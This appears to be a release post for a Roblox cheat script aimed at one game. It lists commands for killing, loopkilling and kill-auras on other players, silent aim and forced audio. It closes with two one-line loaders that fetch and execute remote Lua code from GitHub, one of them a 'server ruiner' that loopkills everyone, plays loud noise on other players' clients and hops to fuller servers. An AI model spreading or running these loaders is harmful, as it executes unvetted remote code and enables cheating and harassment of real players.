Created by Aidez#9632
Features:
- KILL PLAYERS
- MUSIC COMMANDS
- GUN STAT CHANGING
- SILENT AIM
- .
- https://www.roblox.com/games/9157605735/MiscGunTest-X-4-AR15-UPDATE
- COMMANDS
- :kill PLAYERNAME – Kills the matching player. (:kill Aidez) (:kill Aid) (:kill others) (:kill all)
- :loopkill PLAYERNAME – Loopkills the matching player (:loopkill Aidez) (:loopkill Aid) (:loopkill others) (:loopkill all)
- :unloopkill PLAYERNAME – Unloopkills the matching player (:unloopkill Aidez) (:unloopkill Aid) (:unloopkill others) (:unloopkill all)
- :loopkilling – Prints a list of players being loopkilled
- :killaura – Kills any players that get near you
- :killaura PLAYERNAME – Puts a kill aura around the matching player. (:killaura Aidez) (:killaura Aid) (:killaura others) (:killaura all)
- :unkillaura – Turns off your killaura.
- :unkillaura PLAYERNAME – Turns off killaura for the matching player.
- :killauras – Prints a list of players protected by killaura
- :silentaim – Makes your shots always hit the player closest to your mouse
- :unsilentaim – Turns off silent aim
- :music SOUNDID – Plays the music with the given soundid. (CANNOT BE TURNED OFF) (MAKE SURE THE AUDIO YOU PLAY IS FOUND IN THE CREATOR MARKETPLACE: https://create.roblox.com/marketplace/music)
- :music SOUNDID VOLUME – Plays Plays the music with the given soundid and volume (:music 6888804513 10) (:music 6888804513 1)
- :music SOUNDID VOLUME PITCH – Plays Plays the music with the given soundid, volume, and pitch (:music 6888804513 1 0.1) (:music 6888804513 1 10)
- :whitelist PLAYERNAME – Whitelists the matching player, and lets them use commands like kick and kill on anyone but you. (:whitelist Aidez) (:whitelist Aid) (:whitelist others) (:whitelist all)
- :unwhitelist PLAYERNAME – Unwhitelists the matching player. (:unwhitelist Aidez) (:unwhitelist Aid) (:unwhitelist others) (:unwhitelist all)
- :whitelisted – Prints a list of players who are whitelisted
- !! PRESS ‘ TO TYPE IN COMMAND BAR !!
SCRIPTS: [2]
COMMAND SCRIPT:
loadstring(game:HttpGet(('https://raw.githubusercontent.com/Aidez/MiscGunTest_X/main/command_script'),true))()
SERVER RUINER:
loadstring(game:HttpGet(('https://raw.githubusercontent.com/Aidez/MiscGunTest_X/main/autoexe_server_ruiner'),true))()
--[[
This script will do a few things:
1. Loopkill everyone in the server
2. Spam ear rape and monkey noises on everyone else's clients
3. Wait until there's under 5 players in the server, at which point it'll jump to a more populated server.
--]]